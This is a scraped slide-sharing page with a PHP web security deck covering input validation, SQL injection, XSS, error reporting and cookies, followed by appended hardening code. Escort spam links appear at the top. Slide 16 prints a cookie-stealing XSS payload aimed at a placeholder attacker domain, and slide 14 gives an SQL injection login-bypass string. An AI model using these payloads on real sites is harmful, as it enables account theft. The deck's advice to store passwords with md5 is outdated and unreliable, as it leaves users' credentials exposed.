08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 

PHP Security

  • 2.
  • 3. Consequently, PHP applications often end up working with sensitive data. a. Unauthorized access to this data is unacceptable. b. To prevent problems, a secure design is needed. www.mindfiresolutions.com | www.twitter.com/mindfires | http://wikipedia.org/wiki/mindfire_solutions
  • 4. Basic Steps 1. Input fields must be sanitized before being used. One of the key concepts you must accept is that user input is unreliable and not to be trusted. It may be: partially lost in transmission between server and client; corrupted by some in-between process; modified by a malicious user in an unexpected manner; an intentional attempt to gain unauthorized access or to crash the application. There are many ways to sanitize data. One can use PHP's built-in functions for sanitization or custom-defined functions. E.g.: All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous. if (!empty($_GET['id'])) { $id = (int) $_GET['id']; } else { $id = 0; } PHP also comes with the ctype extension, which offers a very quick mechanism for validating string content.
  • 5. if (!ctype_alnum($_GET['login'])) { echo "Only A-Za-z0-9 are allowed."; } if (!ctype_alpha($_GET['captcha'])) { echo "Only A-Za-z are allowed."; } You can also use your own customized validation, like: function validateEmail($email) { if ($email == "") { return false; } else { if (!preg_match('/^[-_.a-z0-9]+@([-a-z0-9]+\.)+[a-z]{2,4}$/i', $email)) { return false; } else { return true; } } }
  • 6. 2. Data Validations: As we all know, there are two types of validation for a web application: a. Client-side validation b. Server-side validation. Client-side validation is not reliable, as an attacker can always bypass it or shut off the client-side script routines, for example by disabling JavaScript. Hence server-side validation is a must from the security point of view, even if client-side validation exists.
  • 7. 3. Accessing Input Data: There are a series of super-globals which offer very simple access to the input data: $_GET, $_POST, $_SERVER, $_REQUEST. Using GET to send sensitive data is a security violation. When sensitive data is to be passed to the server, do not send it as a parameter in the query string, as in: http://sitename/check_valid.php?cardnumber=1234567890123456. This is not appropriate because the entire URL may be stored by the browser in its history, potentially exposing the sensitive information to someone else using the same machine later. The POST method uses the HTTP body to pass information, and this is good in this case because the HTTP body is not logged. However, using POST alone doesn't offer enough protection. The data's confidentiality and integrity are still at risk because the information is still sent in clear text. So encryption using SSL is required. Data is stored and accessed securely.
  • 8. 4. Escaping Output: Output is anything that leaves your application, bound for a client. The client, in this case, is anything from a Web browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands. To escape output intended for a Web browser, PHP provides htmlspecialchars() and htmlentities(). E.g.: $_POST['data'] = "<script>alert('Security issues');</script>"; $var = $_POST['data']; if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $var = stripslashes($var); } echo htmlentities($var);
  • 9.
  • 10. 5. Register Globals: The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Turning register_globals on is a security risk. Therefore, one should always develop and deploy applications with register_globals disabled. Why is it a security risk? Consider the following block of code: <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ?>
  • 11. Since $authorized is left uninitialized if user authentication fails, an attacker could access privileged data by simply passing the value via GET: http://example.com/script.php?authorized=1 Solutions: Disable register_globals in php.ini (already done by default as of PHP 4.2.0). Code with error_reporting set to E_ALL, which allows you to see warnings about the use of uninitialized variables. Use type-sensitive validation conditions: because input is always a string, a type-sensitive comparison to a Boolean or an integer will always fail. A best practice is to initialize all variables and to set error_reporting to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.
  • 12. 6. Error Reporting: During development, turning error reporting on is good practice. ini_set('error_reporting', E_ALL); However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development; your program could run out of memory or disk space, for example. So, for safety's sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can't see if anything goes wrong. error_reporting(E_ALL ^ E_NOTICE); // This is a 'sensible' reporting level ini_set('display_errors', 0); // Hide all error messages from the public ini_set('log_errors', 1); ini_set('error_log', 'path/to_your/log.txt'); /* Preferably a location outside of your web root */
  • 13. 7. SQL Injection: SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. One of the most common vulnerabilities is when logging in to a site. Take this example: $username = $_POST['username']; $password = $_POST['password']; $result = mysql_query("SELECT * FROM site_users WHERE username = '$username' AND password = '$password'"); if (mysql_num_rows($result) > 0) { /* logged in */ }
  • 14. If the attacker enters a valid username, "rob", in the username field and the following in the password field: ' OR 1=1 ' The resulting query will look like this: SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR 1=1 Since the last criterion will always be true, the attacker will be able to log in as rob without knowing rob's password. Preventing SQL injection: The best way of cleaning input is using PHP's built-in mysql_real_escape_string() function, which will escape characters such as ' and " and others. Check whether magic quotes is on or off to avoid double escaping.
  • 15. function check_sql_injection($var) { if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $var = stripslashes($var); } $var = mysql_real_escape_string($var); return $var; } Now this customized function can be used to escape values before they go into a SQL query, to prevent SQL injection: $username = check_sql_injection($_POST['username']); $password = check_sql_injection($_POST['password']); $result = mysql_query("SELECT * FROM site_users WHERE username = '$username' AND password = '$password'");
  • 16. 8. XSS: XSS stands for "Cross Site Scripting", and refers to the act of inserting content, such as JavaScript, into a page. Usually these attacks are used to steal cookies, which often contain sensitive data such as login information. E.g.: $id = $_GET['id']; echo 'Displaying news item number '.$id; An attacker could pass a string like this: <script>window.location.href = 'http://evildomain.com/cookie-stealer.php?c=' + document.cookie;</script> If an attacker put this simple JavaScript into the $_GET['id'] variable of a link and convinced a user to click it, then the script would be executed and pass the user's cookie data on to the attacker, allowing them to log in as the user. It's really that simple.
  • 17. How to prevent XSS attacks? This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. The easiest way to do this is with PHP's built-in strip_tags() function, which will remove HTML from a string, rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to &lt; and &gt; respectively.
  • 18. 9. Passwords need to be stored securely. Secure information, such as passwords and credit card numbers, should be stored in an encrypted format. This can be achieved using the md5 command or any stronger algorithm. By using this, the attacker won't be able to access the password of a user. 10. Lockout functionality must be there for the login functionality. An attacker may continue to brute force the login functions until successful. To prevent this, after a given number of unsuccessful logins over a period of time, the IP/User should be blocked or locked out for a given period of time. For example, 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/User.
  • 19. 11. Email forms are vulnerable to email header injection. Input should be validated and checked so that email header injection cannot occur. Escaping the CR and LF characters is needed, as is using a captcha during mail form submission.
  • 20. 12. Using Cookies Securely: Cookies are an easy and useful way to keep user-specific information available. However, because cookies are sent to the browser's computer, they are vulnerable to spoofing or other malicious use. Follow these guidelines: Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie. Set expiration dates on cookies to the shortest practical time you can. Avoid permanent cookies if possible. Consider encrypting information in cookies. Consider setting the Secure and HttpOnly properties on your cookies to true.
  • 21.
  • 22. For further queries contact us or call 1-248-686-1424 www.mindfiresolutions.com
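The login query from slides 13 to 15 and the password storage point on slide 18, as an added example that is not part of the original slides: the concatenated query next to a parameterized one that checks a stored hash. It assumes the pdo_sqlite extension and uses PDO with password_hash() in place of the mysql_* functions and md5 named on the slides; the table contents are constructed.

```php
<?php
// Added example (not from the original slides). Assumes the pdo_sqlite
// extension; the site_users row below is constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE site_users (username TEXT PRIMARY KEY, password TEXT)');

// Store a salted, deliberately slow hash instead of the password itself.
$insert = $db->prepare('INSERT INTO site_users (username, password) VALUES (?, ?)');
$insert->execute(['rob', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The pattern from slide 13: user input concatenated into the SQL text.
function login_concatenated(PDO $db, string $username, string $password): bool
{
    $sql = "SELECT COUNT(*) FROM site_users
            WHERE username = '$username' AND password = '$password'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Hardened: the username is bound as a parameter, so it is never parsed as
// SQL, and the password is checked against the stored hash in PHP.
function login_prepared(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password FROM site_users WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    if ($hash === false) {
        return false;                    // unknown user
    }
    return password_verify($password, $hash);
}

// Quote-balanced form of the always-true input described on slide 14.
$alwaysTrue = "' OR '1'='1";
var_dump(login_concatenated($db, 'rob', $alwaysTrue));  // input becomes SQL
var_dump(login_prepared($db, 'rob', $alwaysTrue));      // input stays data
var_dump(login_prepared($db, 'rob', 'correct horse'));  // the real password
```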
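The lockout rule from slide 18 (5 unsuccessful logins in 5 minutes, then a 30 minute lockout per IP/User), as an added example that is not part of the original slides. LoginThrottle is a hypothetical class name, and the in-memory arrays stand in for whatever shared store the application uses.

```php
<?php
// Added example (not from the original slides). LoginThrottle is a
// hypothetical helper; state lives in arrays here, where a real
// application would use a shared store such as a database table.
final class LoginThrottle
{
    private const MAX_FAILURES = 5;      // slide 18: 5 unsuccessful logins
    private const WINDOW       = 300;    // ... within 5 minutes
    private const LOCKOUT      = 1800;   // ... lock out for 30 minutes

    private array $failures = [];        // key => list of failure timestamps
    private array $lockedUntil = [];     // key => unix time the lock expires

    public function isLocked(string $key, int $now): bool
    {
        return ($this->lockedUntil[$key] ?? 0) > $now;
    }

    public function recordFailure(string $key, int $now): void
    {
        // Keep only failures that are still inside the sliding window.
        $recent = array_filter(
            $this->failures[$key] ?? [],
            fn (int $t): bool => $t > $now - self::WINDOW
        );
        $recent[] = $now;
        if (count($recent) >= self::MAX_FAILURES) {
            $this->lockedUntil[$key] = $now + self::LOCKOUT;
            $recent = [];                // start counting afresh after the lock
        }
        $this->failures[$key] = array_values($recent);
    }

    public function recordSuccess(string $key): void
    {
        unset($this->failures[$key]);    // a good login clears the counter
    }
}

// Constructed scenario: one failure per minute from the same IP and user.
$throttle = new LoginThrottle();
$key = '203.0.113.7|rob';                // documentation-range IP, sample user
$start = 1700000000;
for ($i = 0; $i < 5; $i++) {
    $throttle->recordFailure($key, $start + 60 * $i);
}
var_dump($throttle->isLocked($key, $start + 241));         // just after the 5th failure
var_dump($throttle->isLocked($key, $start + 240 + 1801));  // after the 30 minutes
```

Call isLocked() before checking credentials, so that a locked key is refused without the password being tested at all.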
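The CR/LF check for mail forms from slide 19, as an added example that is not part of the original slides. It rejects values containing line breaks rather than escaping them; both function names are hypothetical and the form submissions are constructed test input.

```php
<?php
// Added example (not from the original slides). Both functions are
// hypothetical helpers; the submissions below are constructed test input.
function reject_line_breaks(string $value, string $field): string
{
    // A CR or LF inside a header value would start a new header line.
    if (preg_match('/[\r\n]/', $value)) {
        throw new InvalidArgumentException("$field must not contain CR or LF");
    }
    return trim($value);
}

function build_reply_to_header(string $name, string $email): string
{
    $name  = reject_line_breaks($name, 'name');
    $email = reject_line_breaks($email, 'email');
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('email is not a valid address');
    }
    // The display name is quoted, so drop characters that could end the quoting.
    $name = str_replace(['"', '\\'], '', $name);
    return sprintf('Reply-To: "%s" <%s>', $name, $email);
}

$submissions = [
    ['Rob', 'rob@example.com'],
    ["Rob\r\nBcc: list@example.org", 'rob@example.com'],  // carries an extra header line
];
foreach ($submissions as [$name, $email]) {
    try {
        echo build_reply_to_header($name, $email), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```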